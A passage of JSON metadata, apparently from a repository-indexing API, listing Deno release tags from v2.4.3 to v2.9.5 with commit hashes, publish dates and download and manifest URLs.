and/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg